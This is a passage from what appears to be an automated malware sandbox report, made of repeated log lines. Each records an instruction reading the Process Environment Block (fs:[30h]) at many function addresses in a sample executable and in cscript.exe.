          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A94F2E mov eax, dword ptr fs:[00000030h]1_2_00A94F2E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A94F2E mov eax, dword ptr fs:[00000030h]1_2_00A94F2E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACE730 mov eax, dword ptr fs:[00000030h]1_2_00ACE730
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FF10 mov eax, dword ptr fs:[00000030h]1_2_00B2FF10
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FF10 mov eax, dword ptr fs:[00000030h]1_2_00B2FF10
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA70E mov eax, dword ptr fs:[00000030h]1_2_00ACA70E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA70E mov eax, dword ptr fs:[00000030h]1_2_00ACA70E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6070D mov eax, dword ptr fs:[00000030h]1_2_00B6070D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6070D mov eax, dword ptr fs:[00000030h]1_2_00B6070D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABF716 mov eax, dword ptr fs:[00000030h]1_2_00ABF716
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAFF60 mov eax, dword ptr fs:[00000030h]1_2_00AAFF60
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68F6A mov eax, dword ptr fs:[00000030h]1_2_00B68F6A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAEF40 mov eax, dword ptr fs:[00000030h]1_2_00AAEF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488849B mov eax, dword ptr fs:[00000030h]18_2_0488849B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948CD6 mov eax, dword ptr fs:[00000030h]18_2_04948CD6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049314FB mov eax, dword ptr fs:[00000030h]18_2_049314FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]18_2_048F6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]18_2_048F6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]18_2_048F6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]18_2_048F6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]18_2_048F6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]18_2_048F6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]18_2_048F6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]18_2_04931C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]18_2_0494740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]18_2_0494740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]18_2_0494740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048ABC2C mov eax, dword ptr fs:[00000030h]18_2_048ABC2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490C450 mov eax, dword ptr fs:[00000030h]18_2_0490C450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490C450 mov eax, dword ptr fs:[00000030h]18_2_0490C450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA44B mov eax, dword ptr fs:[00000030h]18_2_048AA44B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489746D mov eax, dword ptr fs:[00000030h]18_2_0489746D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]18_2_048A2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]18_2_048A2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]18_2_048A2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]18_2_048A2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]18_2_04872D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]18_2_04872D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]18_2_04872D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]18_2_04872D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]18_2_04872D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AFD9B mov eax, dword ptr fs:[00000030h]18_2_048AFD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AFD9B mov eax, dword ptr fs:[00000030h]18_2_048AFD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A35A1 mov eax, dword ptr fs:[00000030h]18_2_048A35A1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049405AC mov eax, dword ptr fs:[00000030h]18_2_049405AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049405AC mov eax, dword ptr fs:[00000030h]18_2_049405AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]18_2_048A1DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]18_2_048A1DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]18_2_048A1DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]18_2_048F6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]18_2_048F6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]18_2_048F6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov ecx, dword ptr fs:[00000030h]18_2_048F6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]18_2_048F6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]18_2_048F6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04928DF1 mov eax, dword ptr fs:[00000030h]18_2_04928DF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488D5E0 mov eax, dword ptr fs:[00000030h]18_2_0488D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488D5E0 mov eax, dword ptr fs:[00000030h]18_2_0488D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]18_2_0493FDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]18_2_0493FDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]18_2_0493FDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]18_2_0493FDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948D34 mov eax, dword ptr fs:[00000030h]18_2_04948D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493E539 mov eax, dword ptr fs:[00000030h]18_2_0493E539
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]18_2_048A4D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]18_2_048A4D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]18_2_048A4D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AD30 mov eax, dword ptr fs:[00000030h]18_2_0487AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048FA537 mov eax, dword ptr fs:[00000030h]18_2_048FA537
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]18_2_04883D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B3D43 mov eax, dword ptr fs:[00000030h]18_2_048B3D43
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F3540 mov eax, dword ptr fs:[00000030h]18_2_048F3540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04923D40 mov eax, dword ptr fs:[00000030h]18_2_04923D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04897D50 mov eax, dword ptr fs:[00000030h]18_2_04897D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489C577 mov eax, dword ptr fs:[00000030h]18_2_0489C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489C577 mov eax, dword ptr fs:[00000030h]18_2_0489C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490FE87 mov eax, dword ptr fs:[00000030h]18_2_0490FE87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F46A7 mov eax, dword ptr fs:[00000030h]18_2_048F46A7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]18_2_04940EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]18_2_04940EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]18_2_04940EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948ED6 mov eax, dword ptr fs:[00000030h]18_2_04948ED6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A36CC mov eax, dword ptr fs:[00000030h]18_2_048A36CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B8EC7 mov eax, dword ptr fs:[00000030h]18_2_048B8EC7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0492FEC0 mov eax, dword ptr fs:[00000030h]18_2_0492FEC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A16E0 mov ecx, dword ptr fs:[00000030h]18_2_048A16E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048876E2 mov eax, dword ptr fs:[00000030h]18_2_048876E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]18_2_0487C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]18_2_0487C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]18_2_0487C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A8E00 mov eax, dword ptr fs:[00000030h]18_2_048A8E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA61C mov eax, dword ptr fs:[00000030h]18_2_048AA61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA61C mov eax, dword ptr fs:[00000030h]18_2_048AA61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931608 mov eax, dword ptr fs:[00000030h]18_2_04931608
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487E620 mov eax, dword ptr fs:[00000030h]18_2_0487E620
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0492FE3F mov eax, dword ptr fs:[00000030h]18_2_0492FE3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]18_2_04887E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]18_2_04887E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]18_2_04887E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]18_2_04887E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]18_2_04887E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]18_2_04887E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AE44 mov eax, dword ptr fs:[00000030h]18_2_0493AE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AE44 mov eax, dword ptr fs:[00000030h]18_2_0493AE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488766D mov eax, dword ptr fs:[00000030h]18_2_0488766D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]18_2_0489AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]18_2_0489AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]18_2_0489AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]18_2_0489AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]18_2_0489AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]18_2_048F7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]18_2_048F7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]18_2_048F7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04888794 mov eax, dword ptr fs:[00000030h]18_2_04888794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B37F5 mov eax, dword ptr fs:[00000030h]18_2_048B37F5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490FF10 mov eax, dword ptr fs:[00000030h]18_2_0490FF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490FF10 mov eax, dword ptr fs:[00000030h]18_2_0490FF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA70E mov eax, dword ptr fs:[00000030h]18_2_048AA70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA70E mov eax, dword ptr fs:[00000030h]18_2_048AA70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494070D mov eax, dword ptr fs:[00000030h]18_2_0494070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494070D mov eax, dword ptr fs:[00000030h]18_2_0494070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489F716 mov eax, dword ptr fs:[00000030h]18_2_0489F716
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04874F2E mov eax, dword ptr fs:[00000030h]18_2_04874F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04874F2E mov eax, dword ptr fs:[00000030h]18_2_04874F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AE730 mov eax, dword ptr fs:[00000030h]18_2_048AE730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488EF40 mov eax, dword ptr fs:[00000030h]18_2_0488EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488FF60 mov eax, dword ptr fs:[00000030h]18_2_0488FF60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948F6A mov eax, dword ptr fs:[00000030h]18_2_04948F6A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879080 mov eax, dword ptr fs:[00000030h]18_2_04879080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F3884 mov eax, dword ptr fs:[00000030h]18_2_048F3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F3884 mov eax, dword ptr fs:[00000030h]18_2_048F3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B90AF mov eax, dword ptr fs:[00000030h]18_2_048B90AF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AF0BF mov ecx, dword ptr fs:[00000030h]18_2_048AF0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AF0BF mov eax, dword ptr fs:[00000030h]18_2_048AF0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AF0BF mov eax, dword ptr fs:[00000030h]18_2_048AF0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]18_2_0490B8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov ecx, dword ptr fs:[00000030h]18_2_0490B8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]18_2_0490B8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]18_2_0490B8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]18_2_0490B8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]18_2_0490B8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]18_2_048740E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]18_2_048740E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]18_2_048740E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048758EC mov eax, dword ptr fs:[00000030h]18_2_048758EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04944015 mov eax, dword ptr fs:[00000030h]18_2_04944015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04944015 mov eax, dword ptr fs:[00000030h]18_2_04944015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]18_2_048F7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]18_2_048F7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]18_2_048F7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]18_2_0488B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]18_2_0488B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]18_2_0488B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]18_2_0488B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]18_2_048A002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]18_2_048A002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]18_2_048A002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]18_2_048A002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]18_2_048A002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04890050 mov eax, dword ptr fs:[00000030h]18_2_04890050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04890050 mov eax, dword ptr fs:[00000030h]18_2_04890050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04932073 mov eax, dword ptr fs:[00000030h]18_2_04932073
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04941074 mov eax, dword ptr fs:[00000030h]18_2_04941074
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489C182 mov eax, dword ptr fs:[00000030h]18_2_0489C182
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA185 mov eax, dword ptr fs:[00000030h]18_2_048AA185
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2990 mov eax, dword ptr fs:[00000030h]18_2_048A2990
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F69A6 mov eax, dword ptr fs:[00000030h]18_2_048F69A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A61A0 mov eax, dword ptr fs:[00000030h]18_2_048A61A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A61A0 mov eax, dword ptr fs:[00000030h]18_2_048A61A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]18_2_048F51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]18_2_048F51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]18_2_048F51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]18_2_048F51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]18_2_049349A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]18_2_049349A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]18_2_049349A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]18_2_049349A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]18_2_0487B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]18_2_0487B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]18_2_0487B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049041E8 mov eax, dword ptr fs:[00000030h]18_2_049041E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]18_2_04879100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]18_2_04879100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]18_2_04879100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]18_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]18_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]18_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]18_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov ecx, dword ptr fs:[00000030h]18_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A513A mov eax, dword ptr fs:[00000030h]18_2_048A513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A513A mov eax, dword ptr fs:[00000030h]18_2_048A513A
